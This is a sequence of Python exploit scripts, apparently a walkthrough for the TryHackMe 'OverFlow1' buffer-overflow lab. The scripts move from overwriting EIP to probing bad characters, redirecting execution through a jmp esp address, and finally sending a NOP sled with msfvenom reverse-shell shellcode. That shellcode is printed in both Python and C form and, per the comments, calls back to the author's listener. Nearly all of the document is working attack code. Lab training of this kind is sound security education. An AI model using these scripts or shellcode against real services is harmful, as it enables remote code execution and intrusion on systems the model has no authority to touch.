Buffer Overflow Prep — OverFlow1 (TryHackMe)

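import socket
import sys

# Target from the TryHackMe "OverFlow1" room. The VM address changes on every
# deploy, so `python3 script.py <host> [port]` overrides these defaults.
TARGET_HOST = "10.10.194.7"
TARGET_PORT = 1337
TIMEOUT = 5.0  # seconds; a crashed handler never answers, so never block forever

# Command prefix the vulnerable handler parses. The trailing space is part of the
# protocol: without it the filler merges into the command word and the offset
# measured in the debugger is wrong.
message = b"OVERFLOW1 "

# Bytes of filler between the start of the argument and the saved return address.
# With this value correct the four "B"s (0x42424242) are what lands in EIP,
# which is the check this stage performs.
OFFSET = 1978


def build_payload(offset: int = OFFSET, prefix: bytes = message) -> bytes:
    """Return prefix + `offset` bytes of 'A' filler + 'BBBB' as the EIP marker."""
    return prefix + b"A" * offset + b"B" * 4


def send_payload(payload: bytes, host: str = TARGET_HOST, port: int = TARGET_PORT,
                 timeout: float = TIMEOUT) -> None:
    """Send `payload` (CRLF-terminated) to host:port and read the reply.

    Prints "Cannot connect to server" and exits with status 1 when the TCP
    connection cannot be established. A missing or aborted reply after the
    send is reported but not treated as an error: that is what a successful
    crash of the handler looks like from the client side.
    """
    print("Sending payload...")
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError as exc:  # only real connection problems, not every exception
        print(f"Cannot connect to server: {exc}")
        sys.exit(1)
    # `with` closes the socket on every path; the original `s.close` (no
    # parentheses) only evaluated the bound method and never closed anything.
    with sock:
        sock.recv(1024)  # banner
        sock.sendall(payload + b"\r\n")  # send() may write only a prefix of the buffer
        try:
            sock.recv(1024)
        except OSError as exc:  # timeout / reset: expected once the handler has crashed
            print(f"No reply after send ({exc}); check EIP in the debugger")


def main() -> None:
    """Entry point; optional argv: host [port]."""
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else TARGET_PORT
    send_payload(build_payload(), host, port)


if __name__ == "__main__":
    main()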
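import socket
import sys

# Target from the TryHackMe "OverFlow1" room; `python3 script.py <host> [port]`
# overrides the defaults.
TARGET_HOST = "10.10.194.7"
TARGET_PORT = 1337
TIMEOUT = 5.0  # seconds; never block forever on a handler that has crashed

message = b"OVERFLOW1 "  # trailing space is part of the command syntax
OFFSET = 1978  # filler bytes before the saved return address (found in stage 1)


def make_badchars(exclude=(0x00,)) -> bytes:
    """Return every byte value 0x00..0xff in ascending order except those in `exclude`.

    0x00 is skipped by default, matching the original hard-coded list that
    started at 0x01 (a NUL commonly terminates the input before the rest is
    copied, so it is treated as bad up front). Workflow: send, compare the
    bytes at ESP in the debugger with this list, add the first corrupted value
    to `exclude`, resend, repeat until the dump matches. The final `exclude`
    set is what the shellcode must be generated without.
    """
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


badchars = make_badchars()


def build_payload(probe: bytes = badchars, offset: int = OFFSET,
                  prefix: bytes = message) -> bytes:
    """Return prefix + filler + 'BBBB' (EIP slot) + the bad-char probe.

    The probe goes after the return-address slot: after the overwritten `ret`
    ESP typically points at the bytes following it, so the probe is easy to
    locate by following ESP in the debugger's memory dump.
    """
    return prefix + b"A" * offset + b"B" * 4 + probe


def send_payload(payload: bytes, host: str = TARGET_HOST, port: int = TARGET_PORT,
                 timeout: float = TIMEOUT) -> None:
    """Send `payload` (CRLF-terminated) to host:port and read the reply.

    Prints "Cannot connect to server" and exits with status 1 if the TCP
    connection fails; a missing reply after the send is only reported, since a
    crashed handler is the expected outcome here.
    """
    print("Sending payload...")
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError as exc:
        print(f"Cannot connect to server: {exc}")
        sys.exit(1)
    # Context manager closes the socket; the original `s.close` without
    # parentheses never did.
    with sock:
        sock.recv(1024)  # banner
        sock.sendall(payload + b"\r\n")  # sendall, since send() may be partial
        try:
            sock.recv(1024)
        except OSError as exc:
            print(f"No reply after send ({exc}); compare the bytes at ESP now")


def main() -> None:
    """Entry point; optional argv: host [port]."""
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else TARGET_PORT
    send_payload(build_payload(), host, port)


if __name__ == "__main__":
    main()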
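import socket
import struct
import sys

# Target from the TryHackMe "OverFlow1" room; `python3 script.py <host> [port]`
# overrides the defaults.
TARGET_HOST = "10.10.194.7"
TARGET_PORT = 1337
TIMEOUT = 5.0  # seconds

message = b"OVERFLOW1 "  # trailing space is part of the command syntax
OFFSET = 1978  # filler bytes before the saved return address (found in stage 1)

# Address that replaces the 'BBBB' in EIP. 0x625011AF is presumably a `jmp esp`
# in a module of the target that is not rebased/ASLR'd -- confirm in the
# debugger. It must not contain any bad char, and x86 stores it little-endian,
# which is what `struct.pack("<I", ...)` produces (b"\xaf\x11\x50\x62").
JMP_ESP = 0x625011AF
ret = struct.pack("<I", JMP_ESP)


def build_payload(ret_addr: bytes = ret, offset: int = OFFSET,
                  prefix: bytes = message) -> bytes:
    """Return prefix + filler + the 4-byte return address (EIP).

    This stage only checks that execution reaches the gadget: set a
    breakpoint on `JMP_ESP` in the debugger and confirm it is hit.
    """
    return prefix + b"A" * offset + ret_addr


def send_payload(payload: bytes, host: str = TARGET_HOST, port: int = TARGET_PORT,
                 timeout: float = TIMEOUT) -> None:
    """Send `payload` (CRLF-terminated) to host:port and read the reply.

    Prints "Cannot connect to server" and exits with status 1 if the TCP
    connection fails; a missing reply after the send is only reported.
    """
    print("Sending payload...")
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError as exc:
        print(f"Cannot connect to server: {exc}")
        sys.exit(1)
    # Context manager closes the socket; the original `s.close` without
    # parentheses never did.
    with sock:
        sock.recv(1024)  # banner
        sock.sendall(payload + b"\r\n")  # sendall, since send() may be partial
        try:
            sock.recv(1024)
        except OSError as exc:
            print(f"No reply after send ({exc}); check the breakpoint on the gadget")


def main() -> None:
    """Entry point; optional argv: host [port]."""
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else TARGET_PORT
    send_payload(build_payload(), host, port)


if __name__ == "__main__":
    main()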
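/* The same shellcode bytes as the Python `shell_code` listing, in msfvenom's C
 * output format.
 * NOTE(review): the original listing used typographic quotes (U+201C/U+201D),
 * which do not compile; these are plain ASCII double quotes. The bytes embed
 * the original author's callback host/port and were generated against the
 * author's bad-char list, so regenerate rather than reuse them. */
unsigned char buf[] =
"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
"\x74\x5b\xad\x98\x75\x4e";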
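import socket
import struct
import sys

# Target from the TryHackMe "OverFlow1" room; `python3 script.py <host> [port]`
# overrides the defaults.
TARGET_HOST = "10.10.194.7"
TARGET_PORT = 1337
TIMEOUT = 5.0  # seconds

message = b"OVERFLOW1 "  # trailing space is part of the command syntax
OFFSET = 1978  # filler bytes before the saved return address (found in stage 1)

# msfvenom output in python format. NOTE(review): these bytes embed the original
# author's LHOST/LPORT and were generated against the author's bad-char list.
# Regenerate for your own listener (with `-b` set to the bad chars found in the
# previous stage) instead of reusing them; a payload with the wrong callback
# address "works" in the debugger and then silently does nothing.
shell_code = (b"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
b"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
b"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
b"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
b"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
b"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
b"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
b"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
b"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
b"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
b"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
b"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
b"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
b"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
b"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
b"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
b"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
b"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
b"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
b"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
b"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
b"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
b"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
b"\x74\x5b\xad\x98\x75\x4e")

# Address that replaces the 'BBBB' in EIP: presumably a `jmp esp` in a module
# of the target that is not rebased/ASLR'd (confirmed in the previous stage).
# Must contain no bad char; x86 stores it little-endian (b"\xaf\x11\x50\x62").
JMP_ESP = 0x625011AF
ret = struct.pack("<I", JMP_ESP)

# Padding between ESP and the shellcode. Encoded payloads decode themselves in
# place and may write around their own start; the sled keeps that from
# corrupting the first instructions. Also NOP-safe if `jmp esp` lands a few
# bytes early or late.
NOP_SLED = b"\x90" * 32


def build_payload(shellcode: bytes = shell_code, ret_addr: bytes = ret,
                  sled: bytes = NOP_SLED, offset: int = OFFSET,
                  prefix: bytes = message) -> bytes:
    """Return prefix + filler + return address + NOP sled + shellcode.

    After the overwritten `ret`, ESP typically points at the bytes right after
    the return-address slot, so the sled and shellcode are what `jmp esp`
    executes.
    """
    return prefix + b"A" * offset + ret_addr + sled + shellcode


def send_payload(payload: bytes, host: str = TARGET_HOST, port: int = TARGET_PORT,
                 timeout: float = TIMEOUT) -> None:
    """Send `payload` (CRLF-terminated) to host:port and read the reply.

    Prints "Cannot connect to server" and exits with status 1 if the TCP
    connection fails. No reply after the send is only reported: with a working
    reverse shell the handler never answers this socket again, so start the
    listener before running this.
    """
    print("Sending payload...")
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError as exc:
        print(f"Cannot connect to server: {exc}")
        sys.exit(1)
    # Context manager closes the socket; the original `s.close` without
    # parentheses never did.
    with sock:
        sock.recv(1024)  # banner
        sock.sendall(payload + b"\r\n")  # sendall, since send() may be partial
        try:
            sock.recv(1024)
        except OSError as exc:
            print(f"No reply after send ({exc}); check your listener")


def main() -> None:
    """Entry point; optional argv: host [port]."""
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else TARGET_PORT
    send_payload(build_payload(), host, port)


if __name__ == "__main__":
    main()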
